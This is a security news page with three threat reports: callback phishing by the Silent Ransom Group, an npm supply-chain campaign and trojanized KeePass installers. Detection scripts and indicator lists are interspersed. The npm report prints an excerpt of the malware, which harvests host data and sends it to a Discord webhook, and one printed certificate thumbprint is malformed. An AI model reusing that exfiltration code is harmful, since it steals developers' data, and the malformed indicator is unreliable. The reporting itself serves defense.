Exploit

# Google Chrome Faces Active Exploitation of Critical Vulnerability

Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) faces compounded risks. “Every unpatched Chromium instance is a potential entry poi...

23-May-2025
5 min read


Related Articles


Social Engineering

Callback

# Silent Ransom Group (Luna Moth) targets US law firms via social engineering, dat...

The **Silent Ransom Group (SRG)**, also tracked as **Luna Moth**, **Chatty Spider**, and **UNC3753**, is a cybercriminal syndicate specializing in **data exfiltration extortion**. Emerging from the remnants of the [Conti ransomware](https://www.secureblink.com/cyber-security-news/lock-bit-ransomware-new-encryptor-and-impact-on-the-derivatives-trading-market) group in March 2022, SRG has refined its focus on **social engineering**, **callback phishing**, and **legitimate tool abuse** to steal sensitive data from high-value targets, primarily U.S. law firms and financial institutions. Unlike traditional ransomware actors, SRG avoids encryption, instead leveraging stolen data for **multi-million-dollar extortion demands** ($1M–$8M). This report provides an exhaustive analysis of SRG’s tactics, operational infrastructure, and actionable defense strategies.

## **Background and Evolution**

### **Origins and Splintering from Conti**

- **Conti Syndicate Roots**: SRG members originated from the Conti ransomware operation, a prolific Russian-aligned group linked to **BazarCall** campaigns and **Ryuk/Conti** ransomware deployments.
- **Post-Conti Shutdown (March 2022)**: After Conti disbanded due to internal leaks and law enforcement pressure, SRG formed as an independent entity, retaining Conti’s social engineering expertise but pivoting to **pure data extortion**.

### **Campaign Timeline**

- **2022**: Initial campaigns focused on **BazarCall**-style callback phishing to deploy ransomware.
- **2023**: Shift to **data theft extortion**, targeting the legal and financial sectors.
- **2024**: Expansion of **typosquatted domain registrations** and RMM tool abuse.

## **Operational Framework**

### **Core Objectives**

- **Data Exfiltration**: Steal sensitive documents (client contracts, financial records, litigation details).
- **Psychological Extortion**: Pressure victims via phone calls, emails, and threats of data leaks.
- **Profit Maximization**: Tailor ransom demands to victim revenue (1–8% of annual income).

### **Tactics, Techniques, and Procedures (TTPs)**

Aligned with the **MITRE ATT&CK Framework**:

| **Phase** | **Tactics** | **Tools/Techniques** |
|---|---|---|
| **Initial Access** | Callback phishing, typosquatted domains, fake IT support impersonation | Spoofed emails, fake helpdesk portals, VoIP calls |
| **Execution** | Social engineering to install RMM software (e.g., AnyDesk, TeamViewer) | Malicious links to fake IT support sites, PowerShell scripts |
| **Persistence** | Minimal; focuses on rapid data exfiltration | Legitimate RMM tools, scheduled tasks |
| **Privilege Escalation** | Limited; exploits default user permissions | Credential harvesting via keyloggers, browser data extraction |
| **Exfiltration** | Uses WinSCP (SFTP) and Rclone (cloud sync) | Data staged in compressed archives, exfiltrated via HTTPS/SSH |
| **Impact** | Extortion via threats to leak/sell data, direct phone calls to executives | Dedicated leak site (rarely updated), follow-up harassment |

## **Attack Lifecycle Deep Dive**

### **Stage 1: Reconnaissance and Impersonation**

- **Typosquatting Domains**: Registrations mimicking major U.S. law firms (e.g., `sullivancromwell-support[.]com` vs. the legitimate `sullivancromwell.com`).
- **Phishing Lures**: Emails impersonating IT departments with urgent requests (e.g., “Your account will be locked within 24 hours – call [spoofed number]”).

### **Stage 2: Callback Phishing and RMM Deployment**

- **Social Engineering Playbook**:
  1. The victim calls the fake helpdesk number provided in the phishing email.
  2. Attackers pose as IT staff and convince the target to visit a typosquatted domain.
  3. The victim downloads “critical security updates,” which are disguised RMM tools.
- **RMM Abuse**: Tools like **Splashtop** or **ScreenConnect** grant persistent remote access.

### **Stage 3: Data Hunting and Exfiltration**

- **Rapid Triage**: Attackers spend 2–4 hours per compromised device:
  - Searching for keywords such as “confidential,” “merger,” “tax,” and “client.”
  - Targeting shared drives (e.g., `\\NAS\legal_docs`).
- **Exfiltration Methods**:
  - **WinSCP**: Uploads to attacker-controlled SFTP servers.
  - **Rclone**: Syncs data to cloud storage (Mega.nz, Dropbox).

### **Stage 4: Extortion and Negotiation**

- **Ransom Notes**: Sent via email or Tor payment portals, threatening to:
  - Auction the data on dark web forums.
  - Contact clients and partners with the stolen documents.
- **Call-Based Pressure**: Attackers phone employees directly, impersonating executives or legal advisors to accelerate payment.

## **Target Analysis**

### **Sector Focus**

- **Law Firms**: High-value due to sensitive case files, privileged client communications, and financial transaction records.
- **Financial Services**: Targets include hedge funds, accounting firms, and investment banks.

### **Victimology**

- **Geographic Focus**: 85% of victims are in the U.S., with clusters in New York, Washington D.C., and California.
- **Size**: Mid-sized firms (50–500 employees) lacking mature SOC capabilities.

## **Mitigation Strategies**

### **Technical Controls**

- **Block RMM and Unauthorized Tools**:
  - Use application allowlisting to block unauthorized RMM software.
  - Monitor for processes like `winscp.exe` or `rclone.exe` running in non-admin contexts.
- **Network Segmentation**:
  - Isolate sensitive data repositories (e.g., legal case files) with strict access controls.
  - Deploy microsegmentation to limit lateral movement.
- **Detect Exfiltration Signatures**:
  - Flag large outbound transfers (>10GB) via SFTP/HTTPS.
  - Use DLP solutions to block unauthorized uploads to cloud storage.

### **Human-Centric Defenses**

- **Phishing Simulations**: Train employees to:
  - Recognize typosquatted domains (e.g., “sullivancromwel.com”).
  - Verify IT requests via a secondary channel (e.g., Slack, in person).
- **Callback Phishing Response Protocol**:
  - Mandate that all IT support requests originate from internal ticketing systems.
  - Use VoIP call filtering to block spoofed numbers.

### **Incident Response Preparation**

- **Pre-Negotiation Planning**: Designate legal and cyber-insurance teams to handle extortion communications.
- **Backup and Recovery**:
  - Maintain air-gapped, encrypted backups tested quarterly.
  - Implement versioning to recover from data corruption.

## **SRG Attack on a U.S. Law Firm**

### **Attack Timeline**

- **Day 1**: Phishing email sent to a paralegal: “Urgent: Your Microsoft 365 license has expired.”
- **Day 2**: The paralegal calls a fake helpdesk and installs AnyDesk.
- **Day 3**: Attackers exfiltrate 2TB of merger/acquisition documents via Rclone.
- **Day 5**: Ransom note demands $5.2 million.

### **Lessons Learned**

- **Failure Points**: Lack of MFA on RMM tools; no network segmentation for client data.
- **Post-Incident Actions**: Implemented Zero Trust access controls and quarterly phishing drills.

## **Legal and Regulatory Implications**

- **GDPR/CCPA Compliance**: Breached firms face fines for failing to protect client data.
- **Ethical Obligations**: Law firms are required to disclose breaches to clients under the ABA Model Rules.
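The two "Technical Controls" bullets that are easiest to turn into detection logic are the process watch for `winscp.exe`/`rclone.exe` outside an admin context and the >10GB outbound-transfer threshold. The script below is an added example written for this page, not code from the report or from any vendor; the JSON-lines telemetry format, host names, user names and byte counts are all constructed, and the RMM process names beyond those the report lists are an assumption.

```python
"""Detection logic for the SRG 'Technical Controls' above (added example).

Flags (1) winscp.exe / rclone.exe running outside an administrative context,
(2) RMM tools present on a host so they can be checked against an allowlist, and
(3) outbound byte totals per host/destination over SFTP or HTTPS above 10 GB.
The telemetry is constructed sample data in a hypothetical JSON-lines shape.
"""
import json
import ntpath
from collections import defaultdict

# Exfiltration tools named in the report, plus RMM tools it mentions (assumed .exe names).
EXFIL_TOOLS = {"winscp.exe", "rclone.exe"}
RMM_TOOLS = {"anydesk.exe", "teamviewer.exe", "splashtop.exe", "screenconnect.exe"}

# Destination ports for the channels the report associates with exfiltration.
EXFIL_PORTS = {22: "sftp/ssh", 443: "https"}
TEN_GB = 10 * 1024 ** 3

# Constructed process-creation events (hypothetical EDR export, one JSON object per line).
PROCESS_EVENTS = """
{"host": "LAW-WS-017", "user": "paralegal1", "is_admin": false, "image": "C:/Users/paralegal1/Downloads/rclone.exe", "cmdline": "rclone.exe sync D:/Cases mega:cases"}
{"host": "LAW-WS-017", "user": "paralegal1", "is_admin": false, "image": "C:/Program Files/AnyDesk/AnyDesk.exe", "cmdline": "AnyDesk.exe"}
{"host": "IT-ADMIN-01", "user": "svc_backup", "is_admin": true, "image": "C:/Program Files/WinSCP/WinSCP.exe", "cmdline": "winscp.exe /script=nightly.txt"}
{"host": "LAW-WS-022", "user": "associate3", "is_admin": false, "image": "C:/Windows/System32/notepad.exe", "cmdline": "notepad.exe brief.txt"}
"""

# Constructed outbound flow records; 203.0.113.0/24 is a documentation address range.
FLOW_RECORDS = """
{"host": "LAW-WS-017", "dst": "203.0.113.10", "dport": 22, "bytes_out": 6442450944}
{"host": "LAW-WS-017", "dst": "203.0.113.10", "dport": 22, "bytes_out": 5368709120}
{"host": "LAW-WS-022", "dst": "203.0.113.40", "dport": 443, "bytes_out": 104857600}
{"host": "LAW-WS-017", "dst": "10.0.0.5", "dport": 445, "bytes_out": 21474836480}
"""


def parse_jsonl(text):
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def flag_tool_processes(events):
    """Return (host, user, image_name, reason) for exfil tools outside admin context and for RMM tools."""
    findings = []
    for ev in events:
        # ntpath handles both '\\' and '/' separators, so Windows paths work on any host.
        name = ntpath.basename(ev["image"]).lower()
        if name in EXFIL_TOOLS and not ev["is_admin"]:
            findings.append((ev["host"], ev["user"], name, "exfil tool outside admin context"))
        elif name in RMM_TOOLS:
            findings.append((ev["host"], ev["user"], name, "RMM tool present; verify against allowlist"))
    return findings


def flag_large_transfers(flows, threshold=TEN_GB):
    """Sum bytes_out per (host, dst, port) over SFTP/HTTPS and return totals above threshold."""
    totals = defaultdict(int)
    for flow in flows:
        if flow["dport"] in EXFIL_PORTS:  # SMB and other internal traffic is ignored here
            totals[(flow["host"], flow["dst"], flow["dport"])] += flow["bytes_out"]
    return [(host, dst, EXFIL_PORTS[port], total)
            for (host, dst, port), total in totals.items() if total > threshold]


if __name__ == "__main__":
    for finding in flag_tool_processes(parse_jsonl(PROCESS_EVENTS)):
        print("PROCESS", finding)
    for finding in flag_large_transfers(parse_jsonl(FLOW_RECORDS)):
        print("TRANSFER", finding)
```

The sample data deliberately includes a 20GB SMB transfer to an internal host (port 445) that is not flagged, and a WinSCP run by an admin service account that is not flagged either; the two SFTP flows from the same workstation are only caught because they are summed per destination rather than judged individually.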

24-May-2025
5 min read

Data Wiper

Info Stealer

# Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...

A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines. The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors. Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000.

### **Campaign Overview**

#### **Key Details**

- **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.).
- **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation.
- **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes.
- **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions.

#### **Attack Workflow**

1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. the legitimate `react-xterm`).
2. **Post-Install Execution**: A script declared in `package.json` triggers automatically during `npm install`.
3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths.
4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`).
5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims.

### **Technical Deep Dive**

#### **Malicious Code Analysis**

The script, identical across all 60 packages, leverages the Node.js modules `os`, `dns`, and `https` to gather intelligence (excerpt; elided parts are shown as `...`):

```javascript
const os = require("os");
const dns = require("dns");
const https = require("https");

// Collect internal IPs and hostnames
function getIPAddress() {
  const networkInterfaces = os.networkInterfaces();
  // ... iterates NICs to find non-internal IPv4 addresses
}

// Fetch external IP and ISP details via ipinfo.io
function getExternalIP(cb) {
  https.get('https://ipinfo.io/json', (res) => { ... });
}

// Evade sandboxes
if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) {
  return;
}

// Exfiltrate to Discord
const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/...";
https.request(webhookURL, ...).write(trackingData);
```

#### **Data Exfiltrated**

- **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`.
- **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`).
- **Project Context**: `package.json` name, version, installation path (`__dirname`).

#### **Evasion Techniques**

The script avoids analysis environments by checking:

- Cloud provider DNS strings (AWS, GCP).
- Lab-related hostnames (e.g., `LD.local`).
- Usernames or directories linked to research (e.g., `malicious`, `justin`).

### **Indicators of Compromise (IoCs)**

#### **Malicious Packages**

| **npm Account** | **Packages** (20 each; examples shown) |
|---|---|
| `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` |
| `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` |
| `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` |

*[Full list of 60 packages](#iocs) available in Appendix.*

#### **Infrastructure**

- **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ`
- **External Service**: `ipinfo.io/json` (to geolocate victims).

### **MITRE ATT&CK Mapping**

| **Tactic** | **Technique** | **Details** |
|---|---|---|
| **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. |
| **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. |
| **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. |
| **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. |
| **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. |

### **Implications and Risks**

#### **1. Supply Chain Vulnerabilities**

- **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks.
- **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement.

#### **2. Future Attack Scenarios**

- **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks.
- **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering.

#### **3. npm Ecosystem Weaknesses**

- **Delayed Takedowns**: Despite reports, npm has yet to remove the packages, highlighting response gaps.
- **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector.

### **Expert Insights**

**Socket’s Threat Research Team**:

> _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_

> _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_

### **Mitigation Strategies**

#### **For Developers**

1. **Audit Dependencies**:
   ```bash
   npm ls --all   # Check nested dependencies
   ```
   Cross-reference projects against the [IoCs list](#iocs).
2. **Disable Install Scripts**:
   ```bash
   npm config set ignore-scripts true
   ```
3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking.

#### **For Organizations**

- **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting).
- **Harden CI/CD**:
  - Restrict outbound traffic to block Discord webhooks.
  - Use ephemeral build environments to limit data exposure.
- **Network Segmentation**: Isolate developer machines from critical infrastructure.

#### **For npm**

- **Mandate 2FA for Publishers**: Prevent disposable account abuse.
- **Automated Script Analysis**: Scan packages for risky hooks pre-publication.
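The three developer-side mitigations above (cross-reference against the IoC list, look for install hooks, watch for typosquats such as `react-xterm2`) can be combined into one audit pass over an installed `node_modules` tree. The script below is an added example written for this page, not Socket's tooling or the article's code; the package manifests it scans are constructed, the `KNOWN_BAD` entries are taken from the IoC table above, the `POPULAR` baseline is an assumed allowlist, and the edit-distance lookalike check is deliberately generic so it also works on the typosquatted domains the SRG article describes (one domain case is included).

```python
"""Audit an npm install tree for the warning signs described above (added example).

For every node_modules/<pkg>/package.json it reports:
  * names on a known-bad list (populated here from IoCs quoted in the article),
  * install hooks (preinstall / install / postinstall), which run during `npm install`,
  * names within edit distance 2 of a well-known name (typosquat lookalikes).
It also checks whether `npm config set ignore-scripts true` is in effect in an .npmrc.
All manifests are constructed samples, not real packages.
"""
import json
import os
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
KNOWN_BAD = {"react-xterm2", "netvis", "credit-risk"}      # from the article's IoC table
POPULAR = {"react-xterm", "lodash", "express", "axios"}     # assumed legitimate baseline


def edit_distance(a, b):
    """Levenshtein distance (iterative dynamic programming, O(len(a)*len(b)))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name, baseline=POPULAR, max_distance=2):
    """Return the baseline entry `name` closely resembles (but is not), else None.

    Works for package names and equally for domain names (e.g. SRG-style typosquats).
    """
    for legit in sorted(baseline):
        if name != legit and edit_distance(name, legit) <= max_distance:
            return legit
    return None


def audit_manifest(manifest):
    """Return (name, [findings]) for one parsed package.json."""
    findings = []
    name = manifest.get("name", "")
    if name in KNOWN_BAD:
        findings.append("known malicious package (IoC list)")
    hooks = [h for h in INSTALL_HOOKS if h in manifest.get("scripts", {})]
    if hooks:
        findings.append("install hook(s): " + ", ".join(hooks))
    target = lookalike_of(name)
    if target:
        findings.append(f"name resembles '{target}' (possible typosquat)")
    return name, findings


def audit_tree(node_modules):
    """Walk a node_modules directory and return {package_name: [findings]} for flagged packages."""
    report = {}
    for entry in sorted(os.listdir(node_modules)):
        manifest_path = os.path.join(node_modules, entry, "package.json")
        if os.path.isfile(manifest_path):
            with open(manifest_path, encoding="utf-8") as fh:
                name, findings = audit_manifest(json.load(fh))
            if findings:
                report[name] = findings
    return report


def npmrc_ignores_scripts(npmrc_text):
    """True if the `ignore-scripts=true` line written by `npm config set ignore-scripts true` is present."""
    for line in npmrc_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "ignore-scripts":
            return value.strip().lower() == "true"
    return False


# Constructed manifests: one IoC package with a postinstall hook, one clean package,
# one unknown lookalike of 'express' with a preinstall hook.
SAMPLE_MANIFESTS = {
    "react-xterm2": {"name": "react-xterm2", "version": "1.0.3", "scripts": {"postinstall": "node index.js"}},
    "lodash": {"name": "lodash", "version": "4.17.21"},
    "expresss": {"name": "expresss", "version": "0.0.1", "scripts": {"preinstall": "node setup.js"}},
}


def build_sample_tree(manifests=SAMPLE_MANIFESTS):
    """Write the constructed manifests into a temporary node_modules-style directory."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    for dirname, manifest in manifests.items():
        os.makedirs(os.path.join(root, dirname))
        with open(os.path.join(root, dirname, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for pkg, findings in audit_tree(build_sample_tree()).items():
        print(pkg, "->", "; ".join(findings))
    print("domain lookalike:", lookalike_of("sullivancromwel.com", {"sullivancromwell.com"}))
```

A hook finding on its own is not proof of compromise (many legitimate native modules use `install` scripts), which is why the report lists every reason per package and leaves the triage decision to the reader; in a CI job, a known-bad match or a lookalike-plus-hook combination is the pair worth failing the build on.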

24-May-2025
5 min read

BlackCat

Malvertising

# Trojanized KeePass installers to deploy Cobalt Strike beacons, steal credentials...

A sophisticated, long-running campaign leveraging **trojanized KeePass installers** to deploy **Cobalt Strike beacons**, steal credentials, and execute ransomware has been linked to **Black Basta** and **BlackCat/ALPHV ransomware affiliates**. The campaign, active for **8+ months**, exploits malvertising, code-signing abuse, and trust in open-source software to breach networks.

### **Key Campaign Updates**

1. **Malware Evolution**:
   - **KeeLoader** (trojanized KeePass) now includes **five distinct variants** (July 2024–February 2025) with iterative improvements:
     - **Direct credential exfiltration** → **Local credential storage** → **Cobalt Strike integration**.
     - Signed with **legitimate/revoked certificates** from entities like *S.R.L. INT-MCOM* and *Shenzhen Kantianxia Network Technology Co.*.
   - **Defense evasion**: Code obfuscation (e.g., typos like `Todway` for `ToArray`), encrypted payloads (RC4), and sandbox-aware execution (triggers only after KeePass database access).
2. **Infrastructure Expansion**:
   - **Malvertising Domains**:
     - `aenys[.]com` hosts **subdomains impersonating** WinSCP, Sallie Mae, Phantom Wallet, and cryptocurrency platforms.
     - Redirects via typosquatting domains (e.g., `keeppaswrd[.]com`, `keegass[.]com`).
   - **Cobalt Strike C2**:
     - `arch-online[.]com`, `alcmas[.]com` (watermark **1357776117**), and `1ba8d063-0[.]1b-cdn[.]net` (watermark **678358251**).
3. **Attribution Insights**:
   - **Moderate Confidence**: Activity overlaps with **UNC4696**, a threat actor linked to **Nitrogen Loader** campaigns (historically tied to BlackCat/ALPHV).
   - **Black Basta Connections**: Cobalt Strike watermark **1357776117** is uniquely tied to Black Basta IABs.
   - **Ransom Note Anomaly**: Spoofs Akira ransomware but uses a **Session ID** matching a KeeLoader SHA256 hash, suggesting hybrid tactics.

### **MITRE ATT&CK TTP Mapping**

| **Tactic** | **Technique** | **ID** | **Example** |
|---|---|---|---|
| **Initial Access** | Drive-by Compromise via Malvertising | T1189 | Bing/DuckDuckGo ads redirecting to `keeppaswrd[.]com`. |
| **Execution** | User Execution of Trojanized KeePass Installer | T1204.002 | Victims run `KeePass-2.56-Setup.exe`, believing it legitimate. |
| **Persistence** | Registry Run Keys (`HKCU\...\Run\Keepass`) | T1547.001 | Auto-launches malicious `ShInstUtil.exe`. |
| **Credential Access** | Exfiltrate KeePass Databases as Cleartext CSV (`%localappdata%\<RANDOM>.kp`) | T1555.005 | Code modifies KeePass to export credentials on database access. |
| **Lateral Movement** | SMB/Windows Admin Shares for Cobalt Strike Beacon Propagation | T1021.002 | Drops `cupdater.csproj` (Cobalt Strike) via SMB port 445. |
| **Impact** | VMware ESXi Server Encryption | T1486 | Ransomware targets ESXi datastores; Veeam backups destroyed pre-encryption. |

### **Critical Indicators of Compromise (IoCs)**

**Domains**:

- `aenys[.]com` (malvertising hub), `keeppaswrd[.]com`, `lvshilc[.]com`, `arch-online[.]com`, `alcmas[.]com`.
- Subdomains: `salliemae-com-login[.]aenys[.]com`, `winscp-net-download[.]aenys[.]com`.

**Files**:

- **KeePass Installers**:
  - `KeePass-2.56-Setup.exe` (SHA256: `0000cf6a3c7f7eebc0edc3d1e42e45debb675e57d6fc1fd96995269db1b44b3`).
  - `KeePass-2.57-Setup.exe` (SHA256: `0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8`).
- **Cobalt Strike Payloads**:
  - `db.idx` (masquerades as a JPG; RC4-encrypted with the `--update` key).

**Certificates**:

- **Thumbprints**: `467c6c43e6fbbl7fcaefb46fc41a6b2b829e0efa`, `2CF75DAE1A87CA7962CAF67E7310420BBBC30588`.
- **Signers**: *S.R.L. INT-MCOM*, *Shenzhen Kantianxia Network Technology Co., Ltd.*

---

### **Mitigation & Detection Strategies**

1. **Block Malicious Infrastructure**:
   - Add IoC domains (e.g., `aenys[.]com`, `keeppaswrd[.]com`) to network blocklists.
   - Monitor for connections to C2 infrastructure: `89.35.237[.]180`, `1ba8d063-0[.]1b-cdn[.]net`.
2. **Hunt for Artifacts**:
   - Detect `.kp`/`.ks` files in `%localappdata%` with randomized filenames (e.g., `437.kp`).
   - Flag processes spawning `ShInstUtil.exe` with `--update` arguments.
3. **Verify Software Integrity**:
   - Download KeePass **only from** [keepass.info](https://keepass.info) (SourceForge).
   - Validate checksums and certificates against known-good versions.
4. **Ransomware Preparedness**:
   - Isolate ESXi servers and enforce MFA for administrative access.
   - Regularly audit backup systems (e.g., Veeam) for tampering.

### **Implications & Attribution**

- **Evolving Tradecraft**: Threat actors now **modify open-source codebases** (KeePass) rather than sideloading malware, increasing stealth.
- **Ransomware-as-a-Service (RaaS)**: Links to Black Basta and Nitrogen Loader highlight a **converging criminal ecosystem** where IABs and affiliates share infrastructure and tools.
- **Adversary Resilience**: Despite Black Basta’s decline, affiliated IABs continue operations, underscoring the need to target **root infrastructure** (malvertising domains, bulletproof hosting).
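The "Hunt for Artifacts" and "Verify Software Integrity" items above translate directly into three host-side checks: randomized `<number>.kp`/`.ks` files under the local app-data folder, `ShInstUtil.exe` launched with `--update`, and installer hashes compared against the published SHA256 IoCs. The script below is an added example written for this page, not the researchers' tooling; the directory layout and process events it scans are constructed, and the SHA256 values are copied exactly as printed in the IoC section.

```python
"""Hunting checks for the KeeLoader artifacts listed above (added example).

  1. find_export_artifacts: randomized-name .kp / .ks files (e.g. 437.kp) under %localappdata%
  2. flag_shinstutil_update: process events where ShInstUtil.exe starts with a --update argument
  3. installer_matches_ioc: SHA256 of a downloaded installer compared against published IoCs
The sample directory and process events are constructed; nothing here is real telemetry.
"""
import hashlib
import ntpath
import os
import re
import tempfile

# SHA256 values for the trojanized installers, copied as printed in the IoC section.
KEELOADER_SHA256 = {
    "0000cf6a3c7f7eebc0edc3d1e42e45debb675e57d6fc1fd96995269db1b44b3",
    "0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8",
}

# Exported databases land as <RANDOM>.kp (and .ks) where <RANDOM> is numeric, per the article.
ARTIFACT_NAME = re.compile(r"^\d+\.k[ps]$", re.IGNORECASE)


def find_export_artifacts(localappdata):
    """Return sorted full paths of files under `localappdata` whose name matches <digits>.kp/.ks."""
    hits = []
    for dirpath, _dirs, files in os.walk(localappdata):
        for filename in files:
            if ARTIFACT_NAME.match(filename):
                hits.append(os.path.join(dirpath, filename))
    return sorted(hits)


def flag_shinstutil_update(events):
    """Return the events (dicts with 'image' and 'cmdline') where ShInstUtil.exe ran with --update."""
    flagged = []
    for event in events:
        # ntpath.basename copes with Windows paths regardless of the host running this check.
        image = ntpath.basename(event["image"]).lower()
        if image == "shinstutil.exe" and "--update" in event["cmdline"].split():
            flagged.append(event)
    return flagged


def sha256_of(path):
    """Hex SHA256 of a file, read in 64 KiB chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def installer_matches_ioc(path, iocs=KEELOADER_SHA256):
    """True if the file's SHA256 is in the IoC set (compare lowercase hex to lowercase hex)."""
    return sha256_of(path).lower() in {h.lower() for h in iocs}


# Constructed sample: two export artifacts, two benign files (one of them empty).
def build_sample_localappdata():
    root = tempfile.mkdtemp(prefix="localappdata_")
    for name, content in (("437.kp", b"constructed sample\n"), ("9123.ks", b"constructed sample\n"),
                          ("settings.ini", b"constructed sample\n"), ("empty.bin", b"")):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


# Constructed process events (hypothetical EDR export); only the first should be flagged.
SAMPLE_EVENTS = [
    {"image": "C:\\Users\\jdoe\\AppData\\Roaming\\KeePass\\ShInstUtil.exe", "cmdline": "ShInstUtil.exe --update"},
    {"image": "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "cmdline": "ShInstUtil.exe"},
    {"image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c echo --update"},
]


if __name__ == "__main__":
    root = build_sample_localappdata()
    print("export artifacts:", find_export_artifacts(root))
    print("ShInstUtil --update:", flag_shinstutil_update(SAMPLE_EVENTS))
    sample = os.path.join(root, "437.kp")
    print("IoC match for sample file:", installer_matches_ioc(sample))
```

On a real Windows host, point `find_export_artifacts` at `os.environ["LOCALAPPDATA"]` and feed `flag_shinstutil_update` the process-creation events your EDR or Sysmon exports; the hash check only ever confirms a known-bad installer, so a non-match is not a clean bill of health and should be paired with certificate validation against a known-good KeePass release.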

22-May-2025
3 min read